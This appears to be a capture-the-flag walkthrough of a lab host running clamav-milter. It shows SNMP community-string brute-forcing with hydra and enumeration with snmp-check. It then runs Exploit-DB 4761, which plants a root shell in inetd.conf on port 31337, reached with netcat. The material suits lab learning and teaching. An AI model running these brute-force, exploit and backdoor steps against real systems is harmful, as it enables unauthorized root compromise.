SNMP udp

Looking for string

┌──(kali㉿kali)-[~/pg/clamAV]
└─$ hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $clamav snmp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-29 15:14:37
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://192.168.214.42:161/
[161][snmp] host: 192.168.214.42   password: public
[STATUS] attack finished for 192.168.214.42 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-29 15:14:38

Found one string that is "public".

Searching for data in SNMP

┌──(kali㉿kali)-[~/pg/clamAV]
└─$ snmpwalk -v 1 -c public 192.168.214.42 NET-SNMP-EXTEND-MIB::nsExtendOutputFull

┌──(kali㉿kali)-[~/pg/clamAV]
└─$ snmpwalk -v 2c -c public 192.168.214.42 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
NET-SNMP-EXTEND-MIB::nsExtendOutputFull = No Such Object available on this agent at this OID

Found nothing useful.

Fetching all SNMP Data

┌──(kali㉿kali)-[~/pg/clamAV]
└─$ snmp-check $clamav -p 161 -c public
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.214.42:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 192.168.214.42
  Hostname                      : 0xbabe.local
  Description                   : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686
  Contact                       : Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)
  Location                      : Unknown (configure /etc/snmp/snmpd.local.conf)
  Uptime snmp                   : 00:37:40.69
  Uptime system                 : 00:37:03.17
  System date                   : 2024-12-29 09:58:52.0

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 64
  TCP segments received         : 130235
  TCP segments sent             : 129080
  TCP segments retrans          : 294
  Input datagrams               : 800910
  Delivered datagrams           : 799068
  Output datagrams              : 129409

[*] Network interfaces:

  Interface                     : [ up ] lo
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 10 Mbps
  MTU                           : 16436
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] eth0
  Id                            : 2
  Mac Address                   : 00:50:56:ab:e7:d8
  Type                          : ethernet-csmacd
  Speed                         : 100 Mbps
  MTU                           : 1500
  In octets                     : 65771509
  Out octets                    : 36104873

  Interface                     : [ down ] sit0
  Id                            : 3
  Mac Address                   : 00:00:00:00:e7:d8
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 1480
  In octets                     : 0
  Out octets                    : 0


[*] Network IP:

  Id                    IP Address            Netmask               Broadcast
  1                     127.0.0.1             255.0.0.0             0
  2                     192.168.214.42        255.255.255.0         1

[*] Routing information:

  Destination           Next hop              Mask                  Metric
  0.0.0.0               192.168.214.254       0.0.0.0               1
  192.168.214.0         0.0.0.0               255.255.255.0         0

[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State
  0.0.0.0               25                    0.0.0.0               0                     listen
  0.0.0.0               80                    0.0.0.0               0                     listen
  0.0.0.0               139                   0.0.0.0               0                     listen
  0.0.0.0               199                   0.0.0.0               0                     listen
  0.0.0.0               445                   0.0.0.0               0                     listen

[*] Listening UDP ports:

  Local address         Local port
  0.0.0.0               137
  0.0.0.0               138
  0.0.0.0               161
  192.168.214.42        137
  192.168.214.42        138

[*] Processes:

  Id                    Status                Name                  Path                  Parameters
  1                     runnable              init                  init [2]
  2                     runnable              ksoftirqd/0           ksoftirqd/0
  3                     runnable              events/0              events/0
  4                     runnable              khelper               khelper
  5                     runnable              kacpid                kacpid
  99                    runnable              kblockd/0             kblockd/0
  109                   runnable              pdflush               pdflush
  110                   runnable              pdflush               pdflush
  111                   runnable              kswapd0               kswapd0
  112                   runnable              aio/0                 aio/0
  255                   runnable              kseriod               kseriod
  276                   runnable              scsi_eh_0             scsi_eh_0
  284                   runnable              khubd                 khubd
  348                   runnable              shpchpd_event         shpchpd_event
  380                   runnable              kjournald             kjournald
  935                   runnable              vmmemctl              vmmemctl
  1177                  runnable              vmtoolsd              /usr/sbin/vmtoolsd
  3771                  running               syslogd               /sbin/syslogd
  3774                  runnable              klogd                 /sbin/klogd
  3778                  runnable              clamd                 /usr/local/sbin/clamd
  3781                  runnable              clamav-milter         /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl
  3790                  runnable              inetd                 /usr/sbin/inetd
  3794                  runnable              nmbd                  /usr/sbin/nmbd        -D
  3796                  runnable              smbd                  /usr/sbin/smbd        -D
  3799                  runnable              smbd                  /usr/sbin/smbd        -D
  3801                  running               snmpd                 /usr/sbin/snmpd       -Lsd -Lf /dev/null -p /var/run/snmpd.pid
  3807                  runnable              sshd                  /usr/sbin/sshd
  3885                  runnable              sendmail-mta          sendmail: MTA: accepting connections
  3899                  runnable              atd                   /usr/sbin/atd
  3902                  runnable              cron                  /usr/sbin/cron
  3909                  runnable              apache                /usr/sbin/apache
  3910                  runnable              apache                /usr/sbin/apache
  3911                  runnable              apache                /usr/sbin/apache
  3912                  runnable              apache                /usr/sbin/apache
  3913                  runnable              apache                /usr/sbin/apache
  3914                  runnable              apache                /usr/sbin/apache
  3930                  runnable              getty                 /sbin/getty           38400 tty1
  3931                  runnable              getty                 /sbin/getty           38400 tty2
  3932                  runnable              getty                 /sbin/getty           38400 tty3
  3933                  runnable              getty                 /sbin/getty           38400 tty4
  3934                  runnable              getty                 /sbin/getty           38400 tty5
  3935                  runnable              getty                 /sbin/getty           38400 tty6
  4008                  runnable              apache                /usr/sbin/apache
  4062                  runnable              apache                /usr/sbin/apache
  4063                  runnable              apache                /usr/sbin/apache
  4064                  runnable              apache                /usr/sbin/apache
  4065                  runnable              apache                /usr/sbin/apache

[*] Storage information:

  Description                   : ["Real Memory"]
  Device id                     : [#<SNMP::Integer:0x00007fb0663cf708 @value=2>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00007fb0663cdb60 @value=1024>]
  Memory size                   : 250.82 MB
  Memory used                   : 133.30 MB

  Description                   : ["Swap Space"]
  Device id                     : [#<SNMP::Integer:0x00007fb0663c8c28 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00007fb0663c7058 @value=1024>]
  Memory size                   : 203.91 MB
  Memory used                   : 0 bytes

  Description                   : ["/"]
  Device id                     : [#<SNMP::Integer:0x00007fb0663c2300 @value=4>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00007fb0663c0758 @value=4096>]
  Memory size                   : 3.74 GB
  Memory used                   : 777.50 MB

  Description                   : ["/sys"]
  Device id                     : [#<SNMP::Integer:0x00007fb0663bb988 @value=5>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x00007fb0663b9de0 @value=4096>]
  Memory size                   : 0 bytes
  Memory used                   : 0 bytes


[*] File system information:

  Index                         : 1
  Mount point                   : /
  Remote mount point            : -
  Access                        : 1
  Bootable                      : 1

[*] Device information:

  Id                    Type                  Status                Descr
  768                   unknown               unknown               AuthenticAMD: AMD EPYC 7413 24-Core Processor
  1025                  unknown               running               network interface lo
  1026                  unknown               running               network interface eth0
  1027                  unknown               down                  network interface sit0
  1536                  unknown               unknown               VMware Virtual IDE CDROM Drive
  1552                  unknown               unknown               SCSI disk (/dev/sda)
  3072                  unknown               unknown               Guessing that there's a floating point co-processor

From the process data, I found something very unusal.

3781                  runnable              clamav-milter         /usr/local/sbin/clamav-milter  --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl

Exploit Testing

On searching the web for exploits related to this. I found one on Exploit DB.

Sendmail with clamav-milter < 0.91.2 - Remote Command ExecutionExploit Database

Although I am not sure about the version of the underlying system, I will run this.

After reading the exploit it is clear that this exploit is making a backdoor for use on the port 31337 .

echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf

First I will run the exploit and then i will connect to this port using netcat.

searchsploit -m 4761

perl 4761.pl $clamav

Now connecting to this port.

nc -nv $clamav 31337

Got the connection.

Flag.txt

find / \( -name "flag.txt" -o -name "local.txt" -o -name "proof.txt" \) 2>/dev/null -exec echo "File found:" {} \; -exec cat {} \; ; (ifconfig 2>/dev/null || ip a)

File found: /root/proof.txt
5e4eb9c79d8c5266bdfecb80e85230c8
eth0      Link encap:Ethernet  HWaddr 00:50:56:AB:5B:6F
          inet addr:192.168.214.42  Bcast:192.168.214.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feab:5b6f/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1446 errors:0 dropped:0 overruns:0 frame:0
          TX packets:135 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:127465 (124.4 KiB)  TX bytes:15868 (15.4 KiB)
          Base address:0x2000 Memory:fd5c0000-fd5e0000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

Previoushttp NextLearning

Last updated 1 year ago

hashtagLooking for string

hashtagSearching for data in SNMP

hashtagFetching all SNMP Data

hashtagExploit Testing

hashtagFlag.txt

Looking for string

Searching for data in SNMP

Fetching all SNMP Data

Exploit Testing

Flag.txt